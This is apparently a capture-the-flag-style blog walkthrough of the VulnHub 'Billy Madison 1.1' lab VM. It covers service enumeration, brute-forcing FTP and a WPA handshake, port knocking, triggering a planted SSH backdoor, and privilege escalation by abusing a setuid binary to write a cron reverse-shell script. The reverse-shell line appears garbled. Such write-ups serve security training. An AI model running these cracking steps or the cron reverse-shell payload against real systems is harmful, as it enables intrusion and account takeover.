[VULNHUB] Billy Madison: 1.1

Billy Madison it’s a boot2root VM inspired by the homonym film. Our goal is to root the machine and decrypt BIlly’s 12th grade final project. Let’s start!

PART ONE

Start with an nmap scan:

nmap 192.168.1.17 -sV

The output:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 17:38 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00045s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   closed telnet
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2525/tcp open   smtp

First of all I tried to browse to the HTTP website but there were nothing interesting, so I tried to connect to ssh:

ssh 192.168.1.17

But I got an error:

ssh_exchange_identification: Connection closed by remote host

Mmmmh, there are 2 services to analyze, telnet and smb. I choosed the second one because telnet port was closed:

smbclient -L 192.168.1.17

When it prompts for a password I used a random one. Now I got an interesting output:

WARNING: The "syslog" option is deprecated
Enter cristiano's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    EricsSecretStuff Disk      
    IPC$            IPC       IPC Service (BM)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    BM                   BM

    Workgroup            Master
    ---------            -------
    WORKGROUP            

There is a sharename folder (/EricsSecretStuff) and I can try to open it:

smbclient \\\\192.168.1.17\\EricsSecretStuff

Now I got an smb shell and listing files i found ebd.txt. Open it with gedit:

gedit smb://192.168.1.17/EricsSecretStuff/ebd.txt

Again, choose a random password when it prompts. The content of the file is:

Erics backdoor is currently CLOSED

So I discovered that there is an SSH backdoor in the system but at the moment is closed. I finished analyzing the smb service, now I can switch to telnet:

telnet 192.168.1.17

This is the output:

Trying 192.168.1.17...
Connected to 192.168.1.17.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Paying attention to the message i noticed the upper-case string ROT near rkfpuzrahngvat, which is an old cypher (an example is Caesar Cipher). I tried the worst one, the ROT13 (Google it if you want know why) because “I don’t use ROTten passwords”. So i pasted rkfpuzrahngvat here and the decrypted string is:

exschmenuating

What can I do with that string? After some minutes I tried to browse to http://192.168.1.17/exschmenuating and a new page appears. The interesting part is:

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine! 

Now I know that there is a .cap file into this folder which its name contains “veronica”, also she uses her name as part of her password. An hint to brute force the file name is “she rocks!” which reminded me to rockyou.txt wordlist. So I created a new wordlist from rockyou.txt with passwords which contains “veronica”:

cat rockyou.txt | grep veronica > veronica.txt

Now I used BurpSuite Intruder to bruteforce the filename with the following payload:

GET /exschmenuating/§var§.cap HTTP/1.1
Host: 192.168.1.17
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0

I loaded veronica.txt dictionary and after some seconds I got the filename: 012987veronica.cap. I downloaded it and opened with wireshark. Analyzing it I discovered that it was a mail conversation between Veronica and Eric. The first mail is:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT

The second one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

-VV . QUIT

The third one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

.
QUIT

The fourth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

The fifth one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

The sixth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT

That’s all and it’s clear that Veronica installed the virus into the PC uploaded into FTP server by Eric. I found some interesting information from these mails. The first one is that I need to port knock some ports to open the FTP one and Eric’s account credentials are eric:ericdoesntdrinkhisownpee. So I opened the YouTube video linked into the second mail and I wrote the “Spanish Armada combo”, then I ran this command:

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -T5 -p $x 192.168.1.17; done;

Now I tried to login into FTP:

ftp 192.168.1.17

A login prompt appeared and I typed the Eric’s credentials, now I am logged in.

PART TWO

Listing files I found a .notes and other random things. So I download the file:

get .notes

Now open it, this is the content:

Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

I discovered that to activate the SSH backdoor I need to send an email with a specific content but I need password too which is into Veronica’s FTP folder. First of all open the YouTube video and complete the sentence: My kid will be a soccer player. Now I can brute force the FTP credentials of Veronica:

medusa -h 192.168.1.17 -u veronica -P veronica.txt -M ftp

After a minute I got the credentials:

ACCOUNT FOUND: [ftp] Host: 192.168.1.17 User: veronica Password: babygirl_veronica07@yahoo.com [SUCCESS]

Now I can login to Veronica’s account. I found two file, the first one is < .cap file and the second one is an email. Download them but remember to activate binary mode first:

binary
get eg-01.cap
get email-from-billy.eml

This is the email content:

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

Then I opened the -cap file and I noticed that it was a capture file of the Eric Wi-Fi handshake. So I launched the command:

aircrack.ng -w rockyou.txt eg-01.cap

After some minutes I cracked the Wi-Fi password: triscuit*. Now I have SSH credentials but I need to activate a backdoor sending an email. If you remember the first nmap scan there is an smtp service running on the port 2525, so I can telnet to it and send an email from there:

telnet 192.168.1.17 2525

Now I am logged into the smtp service and now I can send the email. I use Veronica and Eric emails found on the first .cap file:

EHLO kali
MAIL FROM:eric@madisonhotels.com
RCPT TO:vvaughn@polyfector.edu
DATA
My kid will be a soccer player
.
QUIT

Now I performed another nmap to see which port I opened:

nmap 192.168.1.17

And I discovered that the backdoor was on port 1974:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 18:57 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00037s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds
MAC Address: 00:0C:29:A0:57:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So I connect to SSH backdoor with eric:triscuit*:

ssh eric@192.168.1.17 -p 1974

Now I am logged in.

PART THREE

If you want know why the backdoor port was 1974 just:

cat why-1974.txt

Now I need to become root and decrypt the file, so I need some privilege escalation techniques:

find / -perm -2000 -type f 2>/dev/null

I noticed /usr/local/share/sgml/donpcgd which it’s a very uncommon file. I tried to google it without success. Then I remember the Eric’s note which said

"To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards.

The backwards word was the hint, so I googled “dgcpnod” and I found this page: https://blogs.akamai.com/2016/01/delegate-v9913-setuid-binary-vulnerability.html. There is a PoC of the exploit so I followed it with some modifications:

cd /usr/local/share/sgml
touch /tmp/rootme
chmod 755 /tmp/rootme
./donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo '#!/bin/bash' > /etc/cron.hourly/rootme
echo 'mknod /tmp/backpipe p; /bin/bash 0/tmp/backpipe' >> /etc/cron.hourly/rootme

It’s time to listen for a shell locally:

nc -lvp 1234

Now wait one hour and you will get a shell as root! Use Python to get a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I noticed the folder /PRIVATE so I browsed into it and I found two files: BowelMovement and hint.txt. This is the content of the .txt file:

Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

Now I copied the BowelMovement file to /tmp then I download it locally with Eric’s account. Seems to be a TrueCrypt volume (“That truely cracks me up!”) so, first of all I create the custom dictionary file with CeWL:

cewl -d 0 -w wordlist.txt https://en.wikipedia.org/wiki/Billy_Madison

Now crack the volume with truecrack:

truecrack -t BowelMovement -w wordlist.txt

After some minutes I discovered the password which is execrable, now I need to mount the volume:

truecrypt --mount BowelMovement

Now unzip secret.zip:

unzip secret.zip

And you will find the .doc file and THE-END.txt. Open the second file and we have completed the VM!

Advertisements
[VULNHUB] Billy Madison: 1.1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s